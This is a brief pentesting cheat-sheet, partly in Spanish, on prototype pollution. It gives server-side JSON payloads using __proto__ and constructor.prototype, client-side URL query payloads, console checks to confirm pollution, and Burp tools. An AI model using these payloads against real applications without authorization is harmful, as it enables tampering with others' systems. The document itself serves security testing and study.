# Prototype pollution

## Server-side prototype pollution

### JSON-based input

```json
{
    "__proto__":{
        "evilProperty": "evilValue"
    }
}
```

```json
{
    "constructor": {
        "prototype": {
            "evilProperty": "evilValue"
        }
    }
}
```

### Herramientas

* [Server-side prototype pollution scanner (Burp extension)](https://github.com/portswigger/server-side-prototype-pollution)

## Client-side prototype pollution

```
example.com/?__proto__[evilProperty]=evilValue
example.com/?__proto__.evilProperty=evilValue
```

En la consola del navegador, inspeccionar `Object.prototype` para verificar si la propiedad ha sido contaminada exitosamente.

```
Object.prototype
Object.prototype.evilProperty
```

### Herramientas

* [DOM Invader (Burp Suite)](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)